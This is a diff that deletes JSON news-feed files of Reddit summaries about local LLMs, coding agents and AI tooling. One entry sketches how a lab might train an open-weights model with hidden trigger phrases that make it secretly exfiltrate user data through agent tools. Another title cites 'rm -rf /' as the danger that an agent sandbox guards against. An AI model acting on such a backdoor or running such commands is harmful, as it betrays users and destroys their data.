̶p̶̶o̶̶k̶̶e̶̶m̶̶o̶̶n̶ ? / QWEN PLAYS DCSS! - qwen3.6-35b-a3b@q4_k_xl plays open source roguelike adventure DCSS (and does a decent job)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tm9nx3/qwen_plays_pokemon_qwen_plays_dcss_qwen3635ba3bq4/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-24T11:31:24.000Z", - "summary": "Hi, (TLDR.): Qwen in its MTP version has tool call bugs and outputs everything into tool/thinking blocks - mangeling the output - canceling the +speed with repeated wrong tool calls! DCSS works well with non MTP qwen even on smaller qwants. im Testing the new MTP models and thought the Hermes plays pokemon skill would be fun to test - expecting codex doing a good job and Qwen at least being able to navigate etc - but after a little research it looks like all LLM (even the big ones) cant play pokemon without hickups - so i tried to find a game the LLM can play - to use it as benchmarks - all the numbers from the official benchmarks are a nice indicator but i wanted real tests - after tons of IMG research and push to telegram etc - palying games seemed the next step to test - Qwen can play DCSS in its qwen3.6-35b-a3b@q4\\_k\\_xl NON MTP VERSION pretty well! in a Terminal you can see/control if needed! - telegram text update + ascii/screenshots on milestones or errors \\- MTP version produced mangeled tool calls! (240k context/8koutput token, 0,6 temp/20topK, 1Rep. penalty, 1.5 pres. penalty, 0.95 topP) LM studio on 5090 if anyone is interested in the skill / prompt i can upload it late…", - "category": "ai_models" - }, - { - "title": "How I do use the recent llama.cpp native tools to do web rag a.k.a. web_fetch (or anything else for the matter) directly from inside the llama-server's webui", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tm93ng/how_i_do_use_the_recent_llamacpp_native_tools_to/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-24T11:02:32.000Z", - "summary": "As some other fellow lllmers I've discovered few days ago that the amazing llama.cpp project has just added native tools functionalities into the server. After having enabled the relative options into llama-server and played a bit with the most harmless of them all, get\\_datetime, I've bit the bullet and cautiously enabled the big boss: exec\\_shell\\_command. Building upon my recent sandboxing efforts relative to pi coding agent, another fantastic tool, I implemented this workflow to more safely use it into linux by multi-sandboxing: step 0) enabled llama-server options for native tools step 1) install firejail system wide step 2) create a new linux user called vmagents (a.k.a. \"virtual machine agent smith\") to prevent escalation or messing up with my own user workspace home dir step 3) login into vmagents user and install smolmachines, an easy to use OCI virtual machine containers harness step 4) create a VM called minivm and start it to pull in a bare bones busybox commands based Alpine linux OCI image step 5) create the script minivm-exec (and make it executable) into vmagents exec dir to spinup the sandbox VM, exec a given command into it into further firejail sandbox, turn it…", - "category": "ai_models" - }, - { - "title": "48 frontends for Comfy!", - "url": "https://reddit.com/r/StableDiffusion/comments/1tm25k8/48_frontends_for_comfy/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-05-24T04:40:33.000Z", - "summary": "This is an update of the list that I made 5 months ago. [4 months ago it was 26](https://www.reddit.com/r/StableDiffusion/comments/1qyrw4z/26_frontends_for_comfy/). Many of UIs were suggested by user iwr-redmond. Below is list with only names; links, descriptions are in the awesome list itself on github: [https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui](https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui) Category 1: Close integration, work with the same workflows 1. SwarmUI 2. Minimalistic Comfy Wrapper WebUI 3. Open Creative Studio for ComfyUI 4. ComfyUI Mobile Frontend 5. ComfyMobileUI 6. ComfyChair 7. ComfyScript 8. WorkflowUI 9. FlowScale AIOS 10. ComfyUI-Workflow-Studio 11. Promptus CosyUI Category 2: UI for workflows exported in API format 1. ViewComfy 2. ComfyUI Mini 3. Generative AI for Krita (Krita AI diffusion) 4. Intel AI Playground 5. Comfy App (ComfyUIMobileApp) 6. ComfyUI Workflow Hub 7. Mycraft 8. ComfyUI WebUI Generator 9. Nexa - Your On-the-Go ComfyUI Companion 10. CivitDeck 11. ComfyUI Skills for OpenClaw 12. ComfyUI\\_bsk\\_UI 13. OutSweeper 14. Orange Category 3: Use Comfy UI as runner server (worklows made by developers) 1.…", - "category": "creative_tools" - }, - { - "title": "🚀 Skills for small businesses, officially released by Anthropic", - "url": "https://reddit.com/r/ClaudeAI/comments/1tm94ai/skills_for_small_businesses_officially_released/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-24T11:03:28.000Z", - "summary": "Anthropic’s 31 small-business skills reportedly hit around 382,000 downloads on day one. And now someone has mapped the whole thing into a setup workflow that can apparently be deployed in \\~10 minutes. This is actually a pretty interesting shift. Small businesses used to stitch together automations manually across: Zapier Notion CRM tools email workflows internal docs custom scripts Now AI companies are starting to package the whole thing into reusable skill packs: 🧠 workflow 📚 memory ⚙️ behavior 🔗 connectors 🤖 orchestration 📋 operating rules Basically: business operations as AI-readable skill files. The best part? You don’t necessarily need Claude to use them. At the core, these are still .md skill files describing workflows for AI agents. So even if you’re using Codex, Cursor, Gemini, or another coding agent, you can still study the structure, adapt the workflows, and plug the ideas into your own agent setup. This feels like the beginning of a new category: “AI business operating templates.” GitHub: https://github.com/anthropics/knowledge-work-plugins", - "category": "ai_tools" - }, - { - "title": "Claude code - Cultivate your context window to get the max out of your tokens", - "url": "https://reddit.com/r/ClaudeAI/comments/1tm594m/claude_code_cultivate_your_context_window_to_get/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.8600000000000001, - "date": "2026-05-24T07:27:11.000Z", - "summary": "Many times during the start of the session or when you have cleared or compacted the session, claude tends to read the entire codebase resulting in context window bloating. if your repo is large and/or if you are working with multiple repos it means your context window will have a lot of stuff which are not really relevant for the feature work that you are doing rn. Instead of claude having to read the entire codebase you have a map of your repos at different granularity and guide claude using [claude.md](http://claude.md) file to read the map. this helps claude get the context better without the context window bloating. if you are working on typescript/javascript based repos you can check what i built here in this repo: [https://github.com/justinjamesmathew/tokenmax-mcp](https://github.com/justinjamesmathew/tokenmax-mcp) the idea is to have three tiers of structural context loaded at three different times. The Registry is a small directory of every repo that is registered, with a short paragraph for each covering what it does, what stack it uses, where it lives, and when it was last indexed. It loads automatically into every Claude Code session via \\~/.claude/[CLAUDE.md](http://c…", - "category": "ai_tools" - }, - { - "title": "LongCat-Video-Avatar 1.5 Release", - "url": "https://reddit.com/r/StableDiffusion/comments/1tm5oxh/longcatvideoavatar_15_release/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.78, - "date": "2026-05-24T07:52:12.000Z", - "summary": "HuggingFace Link: [meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5) LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. * 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactio…", - "category": "creative_tools" - }, - { - "title": "Claude records demo videos for me now", - "url": "https://reddit.com/r/ClaudeAI/comments/1tmkee4/claude_records_demo_videos_for_me_now/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 0.62, - "date": "2026-05-24T18:38:15.000Z", - "summary": "I hate recording demo videos, so I made an open source skill for it: [https://github.com/MobAI-App/desktop-recorder-skill](https://github.com/MobAI-App/desktop-recorder-skill) Now I can give Claude a prompt like: Record a short demo of this app flow And it handles the annoying parts for me: preparing the app state, clicking through the flow, recording, adding cursor/click effects and captions, then exporting the video. So instead of spending time setting everything up and recording the same demo manually, I can let Claude do it while I work on something else. It also has Remotion integration, so Claude can generate more polished and editable videos from the recording, not just raw screen captures. The video attached to this post is the result of the skill itself. Also working on the same idea for mobile apps: [https://github.com/MobAI-App/mobile-recorder-skill](https://github.com/MobAI-App/mobile-recorder-skill)", - "category": "ai_tools" - }, - { - "title": "hipEngine: Fast Native Qwen 3.6 Inference for RDNA3 (Strix Halo, 7900 XTX)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tmq4s6/hipengine_fast_native_qwen_36_inference_for_rdna3/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-24T22:21:21.000Z", - "summary": "A few weeks ago, after finishing [FastDMS](https://www.reddit.com/r/LocalLLaMA/comments/1t3vlrx/fastdms_64x_kvcache_compression_running_faster/), I started toying around writing some RDNA3 kernels again to see how fast I could get Qwen 3.6 MoE running. It turned out well enough, so over the past couple weeks, I turned those experiments into [hipEngine](https://github.com/shisa-ai/hipEngine), a new open source (AGPLv3) ROCm-native local LLM inference engine. It's Python based, but with no heavy PyTorch dependency. All the hot-path is HIP/C++, making liberal use of AMD native libs like hipBLASLt, hipGraph, AOTriton, etc. ### gfx1100 (Radeon RX 7900 XTX / Radeon Pro W7900) The initial implementation has Qwen 3.6 (MoE and dense) running competitively with llama.cpp, with the [ParoQuant](https://github.com/shisa-ai/paroquant) (which I've also ported to be ROCm compatible) 4.68bpw having better c=1 prefill (\"prompt processing\") at every tested context length, from 512-128K on gfx1100 (W7900/7900 XTX): ### Prefill tok/s | Workload | hipEngine PARO | hipEngine GGUF Q4_K_S | llama.cpp HIP | llama.cpp Vulkan | | --- | ---: | ---: | ---: | ---: | | 512/128 | **2718.497** | 2258.847 | 2436.04…", - "category": "ai_models" - }, - { - "title": "MergeNB: An intuitive merge conflict resolver built for Jupyter notebooks in VS Code [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tmq1eb/mergenb_an_intuitive_merge_conflict_resolver/", - "source": "Reddit r/MachineLearning", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-24T22:17:41.000Z", - "summary": "I used to work heavily with Jupyter Notebooks + git + VS Code in a collaborative research setting and found nbdime to be somewhat buggy/a hassle to work with in general. So, in typical side project fashion ([relevant xkcd](https://xkcd.com/1319/)) I've been working on MergeNB quite a bit over the last 6 months or so. It's (currently only) a VS Code extension with a web UI, and has a few cool improvements over other alternatives, which I outlined in the README/docs site. I'd be over the moon if this actually gets used by people, and would love a star if it's interesting. See [https://github.com/Avni2000/MergeNB](http://github.com/Avni2000/MergeNB). I've also been working on a static documentation site here: [https://avni2000.github.io/MergeNB/docs](https://avni2000.github.io/MergeNB/docs) I'm planning on working on it a lot more over the summer and properly fleshing out a few of the ideas I had (including making it a git mergetool as well as a VS Code extension), so if you'd like to contribute, feel free to raise an issue or shoot me a message/email :)", - "category": "ai_research" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-25.json b/data/news-feed-2026-05-25.json deleted file mode 100644 index 23b23d4..0000000 --- a/data/news-feed-2026-05-25.json +++ /dev/null @@ -1,279 +0,0 @@ -{ - "generated": "2026-06-05T00:44:43.508Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-25", - "article_count": 15, - "archived_story_count": 588, - "articles": [ - { - "title": "I made a local-first MCP tutorial repo with node-llama-cpp and a custom agent loop", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tn1jjy/i_made_a_localfirst_mcp_tutorial_repo_with/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-25T07:14:17.000Z", - "summary": "I just published a repo called MCP from Scratch that teaches the Model Context Protocol by building it step by step in plain Node.js. Most of the repo is about understanding MCP itself, but the later modules may be relevant here: I added a local-first setup using `node-llama-cpp`, GGUF models, MCP sampling, and a custom plan -> act -> observe agent loop. So the repo goes from: * raw JSON-RPC and stdio transport * to a working MCP server with tools/resources/prompts * to local model integration * to an agent loop that uses MCP tools with a local GGUF model There’s also an optional LangChain example, but the main path is intentionally minimal and tries to make the underlying mechanics obvious. Key points: * plain Node.js, minimal abstractions * designed as a learning repo, not a production SDK * uses shared local GGUF models for the later modules * built for people who want to understand what MCP tooling is actually doing under the hood Repo: [https://github.com/pguso/mcp-from-scratch](https://github.com/pguso/mcp-from-scratch) Would especially love feedback from people here on the local inference side: * model choice * whether the agent loop examples feel useful or too toy-ish", - "category": "ai_models" - }, - { - "title": "I stress-tested Kimi K2.6 against Claude Opus 4.7 on a quick coding-agent task", - "url": "https://reddit.com/r/ClaudeAI/comments/1tn9fpq/i_stresstested_kimi_k26_against_claude_opus_47_on/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-25T13:37:21.000Z", - "summary": "I tested Claude Opus 4.7 and Kimi K2.6 on the same coding agent task i.e. build an AI Fix Runner that takes a broken repo, runs its tests, identifies the failure, applies a patch, reruns the test, and exposes the final diff/logs through an API and UI. The goal was not to benchmark syntax completion or simple repo edits. I wanted to test model behavior on a less familiar integration path: shifting execution from local processes into remote sandboxes. I used Tensorlake specifically because the sandbox API is newer and integration-heavy. This made the test more about whether the model could reason through unfamiliar infra and produce a working implementation. Setup: * Claude Opus 4.7 through Claude Code * Kimi K2.6 through OpenCode via OpenRouter Pricing context: * Claude Opus 4.7: $5/M input, $25/M output * Kimi K2.6: $0.95/M input ($0.16 cached input), $4/M output So, what made it interesting is if Kimi's lower cost can handle a crazy workflow. To be clear, comparing Kimi K2.6 directly with Opus 4.7 is not completely fair. The model classes, pricing, and expected capability levels are very different. I mainly wanted to see how far an open model could get on the same task at a fract…", - "category": "ai_tools" - }, - { - "title": "Workbench Launches Open Source BullMQ Dashboard For Node Backends", - "url": "https://x.com/pontusab/status/2058588422001029549", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-25T01:21:33.840Z", - "summary": "Workbench launched as an open-source BullMQ dashboard with flows, metrics, schedulers, and search for Node backends.", - "category": "ai_tools" - }, - { - "title": "Ditched GitHub Copilot yearly subscription. What's the best way to run Claude nowadays?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tnl23a/ditched_github_copilot_yearly_subscription_whats/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-25T20:34:06.000Z", - "summary": "Hey everyone, I recently cancelled my yearly GitHub Copilot subscription. My old workflow was simple: I used the GitHub Copilot extension in VS Code, but I swapped the backend model to Sonnet / Opus and relied heavily on the `/plan` command to code. I absolutely loved it and I would like that exact flow back. My plan was to just go full Bring Your Own Key (BYOK) inside VS Code using an API key and pay per token for Sonnet or Opus. However, I’m seeing all this hype around CLI tools, and it has me second-guessing my setup. I’m completely open to trying new workflows if they are a massive upgrade, but honestly, I’d be much happier just staying in my cozy VS Code environment if the math makes sense. so my questions are: 1. Is a flat Claude subscription actually cheaper than an API key for heavy coding? In my old copilot plan I believe just once I used all my tokens per month. 2. How bad is the token bleed if I stick to BYOK? I heard with CLI you make some markdown files and things get cheaper / faster. Can you do that with BYOK as well? thanks for any advice!", - "category": "ai_tools" - }, - { - "title": "I built a meme-y social feed for programmers that lives inside Claude Code (and Cursor, and Copilot CLI)", - "url": "https://reddit.com/r/ClaudeAI/comments/1tnlji5/i_built_a_memey_social_feed_for_programmers_that/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-25T20:52:25.000Z", - "summary": "I spend hours every day in Claude Code, but I started feeling weirdly isolated. So I built a tiny social network that lives inside it. WAYD (\"What Are You Doing?\") is a Claude Code skill. You type `/wayd` and either post a short \"vibe\" about your coding day or scroll a random feed of what other developers are losing their minds over. React with emojis, drop a one-line reply, get back to work. The whole thing runs on GitHub Issues as the silent backend. No server, no database, no signup, just your existing `gh` CLI. You never see issues, JSON, or `gh` commands; the skill orchestrates everything in the background. It feels like a tiny social app inside the terminal. 8 vibe-tags to pick from when you post: 🤡 cursed-code, 🪦 rip-me, 🫠 brain-melt, 🧙 dark-arts, 🔥 hot-take, 💭 shower-thought, 🤔 existential, ☕ procrastinating. Each is a mood, not a topic. Write up to 1000 chars, publish under your real GitHub handle, scroll a random feed of strangers doing the same. **Install on Claude Code**: claude plugin marketplace add ferdinandobons/wayd claude plugin install wayd@wayd Other install methods + screenshots: [https://github.com/ferdinandobons/wayd](https://github.com/ferdinandobons…", - "category": "ai_tools" - }, - { - "title": "Is AI inference platform really that saturated now? [D]", - "url": "https://reddit.com/r/MachineLearning/comments/1tngk7p/is_ai_inference_platform_really_that_saturated/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-25T17:52:10.000Z", - "summary": "I’m thinking of expanding an on-device inference SDk into a full blown AI inference platform and seeing more and more inference platform popping out. Been talking with a VC from Seattle/NY. Is this space really that saturated?", - "category": "ai_research" - }, - { - "title": "Reconstructing the agent methodology: Decoupling decision-making and execution - open source [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tnfxsc/reconstructing_the_agent_methodology_decoupling/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-25T17:29:28.000Z", - "summary": "I’ve been thinking about a problem in current agent systems: Most agents are becoming very good at execution, but the decision layer before execution is still unclear. Coding agents, research agents, tool loops, sandboxes, workflows, and harnesses are all improving quickly. Once a human gives an intent, agents can often do a lot of useful work. But the higher-level question is still usually left to the user: What should happen next, and why? I’ve been exploring this idea through an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. It is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - whether execution needs approval - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but it can already be installed, configured with an LLM provider, run in the terminal, inspect Decision Cards, and hand off…", - "category": "ai_research" - }, - { - "title": "I’m building an open-source decision layer above AI agents [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tndi8y/im_building_an_opensource_decision_layer_above_ai/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-25T16:03:36.000Z", - "summary": "Hi everyone, I’m Jia, the creator of Spice. I’ve been working on an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. Most agent systems today are very focused on execution, They are getting better at doing tasks after a human gives them an intent. But the higher-level question is still usually left to the user: What should happen next, and why? That is the layer I want Spice to explore. Spice is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but you can already install it, set up an LLM provider, run it in the terminal, inspect Decision Cards, and hand off approved execution to external agents. My goal is to make agent behavior less of a black box. Instead of only seeing the final result of an agent task, I want to preserve the reasoning…", - "category": "ai_research" - }, - { - "title": "I built a computer use sandbox framework for codex on headless linux. GPU passthrough, computer use, and sudo access for codex all work. It's the perfect dev sandbox to allow full auto work while minimizing the \"rm -rf /\" risk", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tn3i55/i_built_a_computer_use_sandbox_framework_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-25T09:01:19.000Z", - "summary": "I've been working with agents for months now, and I haven't found a sandbox environment that \"just works\" so I built it! My requirements were as follows: 1. Agent is unable to destroy my host OS but able to install software and run sudo commands 2. Agent is able to browse the web autonomously and validate the UI it creates 3. GPU access works (even on DGX spark which cant pass through to 4. Docker works 5. Persistent environment I can setup once, log into my internet accounts I want the agent to access, copy in my .env files, install custom software etc. 6. Support multiple parallel browser use / development sessions concurrently 7. Easily log into each agent's desktop to view the work it's doing or manually setup the agent environment via a desktop interface The inspiration for this project is wanting a sandbox I can let the agent run free in, while limiting the damage it can do. I want it to be able to browse the web, do automated AI research on my GPU, test my docker containers in a sandbox, develop my webapp full-auto, or whatever other task I need it to do while still being safely in a sandbox and unable to wipe or modify my host system. I felt like either I had to go full YO…", - "category": "ai_models" - }, - { - "title": "We added W8A8 activation quantization to MLX — prefill went from 2.84s to 2.52s on M5 Pro", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tn2p61/we_added_w8a8_activation_quantization_to_mlx/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-25T08:16:51.000Z", - "summary": "Hey, I work on inference tooling at Mininglamp AI. We needed faster prefill for a 4B VLM running on Apple Silicon. Problem was MLX only does weight-only quant — activations stay FP16 the whole way through. So we wrote Cider, a small SDK that adds W8A8 activation quant on top of MLX. Numbers on M5 Pro (64GB, 307 GB/s), 4516 token context: |Quantization|Prefill|Decode| |:-|:-|:-| |W8A16 (MLX)|2.839s|80.1 tok/s| |W8A8 (Cider)|2.519s|79.5 tok/s| Under the hood it's custom Metal kernels we registered as MLX primitives. At M=4096 the per-channel path runs 1.84x faster than W8A16 on the same shape. Not just for our model btw — works with anything that runs through MLX. One catch: INT8 TensorOps only compile on M5 and above. pip install on M4 still works, just falls back to the regular path. Repo: [https://github.com/Mininglamp-AI/cider](https://github.com/Mininglamp-AI/cider) Edit: adding accuracy numbers since it came up. Wikitext2 PPL on Qwen3-8B: FP16 9.73, W8A16 9.71, W8A8 per-channel 9.76. Llama3-8B: FP16 6.14, W8A16 6.15, W8A8 per-channel 6.27. Per-group gs=64 keeps it tighter if precision matters more than speed for your use case.", - "category": "ai_models" - }, - { - "title": "xAI releases Grok Build 0.1.219, fixing kitty terminal layout issues and paste-related data loss", - "url": "https://www.digg.com/ai/hlcz47lw", - "source": "Digg AI", - "tags": [ - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-25T06:00:09.947Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Wrote a custom C++ engine for MiniCPM-V 4.6 on Orange Pi AIPro (Ascend 310B) to bypass framework overhead", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tmy4g9/wrote_a_custom_c_engine_for_minicpmv_46_on_orange/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-25T04:19:50.000Z", - "summary": "Hey everyone, just wanted to share a project I've been hacking on for the last few weeks. I managed to build a from-scratch C++ inference engine to run MiniCPM-V 4.6 entirely on the Orange Pi AIPro (the budget board with the Ascend 310B NPU, costs around $149 for 20 TOPS INT8 / 10 TFLOPS FP16). If you want to check out the custom ops, build scripts, or the Gradio web UI, the repository is open source on GitHub at [github.com/lvyufeng/minicpm-v-4.6-orangepi](http://github.com/lvyufeng/minicpm-v-4.6-orangepi) https://preview.redd.it/upfsqb0jm73h1.png?width=1655&format=png&auto=webp&s=1e80185171fa6db651d81e20d717b3a05791614c If you've ever tried deploying local LLMs or VLMs on this specific hardware, you probably know that dealing with the standard framework stack can be a massive pain, especially if you want to get any decent performance on the edge. To get around this, I skipped the heavy frameworks and went low-level. Both the text generation and the SigLIP vision tower run natively on the NPU inside a single C++ subprocess. There is absolutely zero torch\\_npu dependency on the hot path. Python is only used on the cold path for CPU-side tokenization and image preproces…", - "category": "ai_models" - }, - { - "title": "I shipped a windows desktop app for running local LLMs with a button that turns your \"no thats wrong\" into actual LoRA training data", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tmxp03/i_shipped_a_windows_desktop_app_for_running_local/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-25T03:59:18.000Z", - "summary": "i built a local AI desktop app and just shipped it. windows only. called SEELS. dropping it here cause if anyones gonna find the cracks its you guys. the thing i actually wanted to make wasnt another ollama wrapper. what bugged me is every local model id run would say something dumb and id sit there going \"no thats not what i meant\". then id close the chat and the model never knew, never learned. so the whole hook of SEELS is theres a Teach button on every reply where you write what it should have said. those corrections pile up into a jsonl corpus, and when you have enough you click Train and it actually kicks off a PEFT LoRA run on your base. no notebook, no python, no terminal. just chat, correct, train. over time the adapters stack up and it becomes your model not theirs. trained a tiny 0.6B helper from scratch on like 110 hand written examples so theres something that runs on CPU out of the box. not replacing your daily 35B obviously but it answers questions about how to use SEELS itself which was the point. rest of standard (free, forever, not a trial): bring any GGUF, voice mode with whisper STT and piper TTS both local no API keys, hardware dashboard so you can stop guessi…", - "category": "ai_models" - }, - { - "title": "Could Open Models be trained to secretly go rogue?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tmpqrv/could_open_models_be_trained_to_secretly_go_rogue/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-24T22:05:31.000Z", - "summary": "I was discussing with some other folks how safe is to use open weights models from China and the topic of \"trojan horse\" came up. We know that, at least with current architecture, models can't run code on their own. They are entirely dependent on tools and harnesses. We also know that a local run model can't have any kind of remote \"switch\" that would change its behavior or inject a different prompt. But would there be any other ways to \"execute order 66\" 😄 ? Could a lab, for instance, train a model that would change its behavior upon reading certain trigger phrases or perhaps at a specific date? They would then secretly gather sensitive info and send it somewhere else without user consent. Obviously the model would have to be running in an harness capable of such tool-use (which is quite common with openclaws, hermes, etc). Thoughts?", - "category": "ai_models" - }, - { - "title": "I made a Chrome extension that lets me use ChatGPT from any webpage without an API key, so its compeletly free.", - "url": "https://reddit.com/r/ChatGPT/comments/1tmznuc/i_made_a_chrome_extension_that_lets_me_use/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-25T05:36:32.000Z", - "summary": "I’ve been building a Chrome extension called **Dichrome**. The basic idea is simple: it lets you use ChatGPT from a sidebar while you’re on any webpage, without needing an API key or paying for a separate AI sidebar subscription. For example, in the screenshots I was on my GitHub repo page. I clicked the screenshot button in the Dichrome sidebar, typed “Can you see the attached image?”, and hit send. Dichrome then sent the prompt and screenshot to ChatGPT through the normal ChatGPT UI. I didn’t have to open ChatGPT myself, switch tabs, upload the image manually, or copy anything over. The response came back inside the sidebar, and the actual ChatGPT conversation was also saved inside my **Dichrome project folder**. That part matters to me because I don’t want random sidebar chats cluttering my normal ChatGPT history. Anything started from the extension gets routed into its own project folder instead. The workflow is basically: 1. Stay on whatever webpage you’re using 2. Click screenshot or send selected text 3. Type your prompt in the sidebar 4. Dichrome sends it to ChatGPT through the normal UI 5. The answer shows up back in the sidebar 6. The chat gets saved in the Dichrome proj…", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-26.json b/data/news-feed-2026-05-26.json deleted file mode 100644 index bde1ef8..0000000 --- a/data/news-feed-2026-05-26.json +++ /dev/null @@ -1,283 +0,0 @@ -{ - "generated": "2026-06-05T00:44:43.764Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-26", - "article_count": 15, - "archived_story_count": 541, - "articles": [ - { - "title": "open-source plug-in for claude code: declare what it can't do in yaml, enforced at the tool boundary", - "url": "https://reddit.com/r/ClaudeAI/comments/1tofpzr/opensource_plugin_for_claude_code_declare_what_it/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-26T18:29:43.000Z", - "summary": "last week claude code force-pushed on me. nothing in the prompt said it could, it just inferred \"make sure the branch is clean\" loosely. wanted a hard rule i could plug in so this couldn't happen again. so i built sponsio, an open-source plug-in for claude code that gates tool calls at the boundary. apache 2.0. hooks in via the claude agent sdk (or the mcp layer if your tools go through there). write contracts in yaml using assume-guarantee 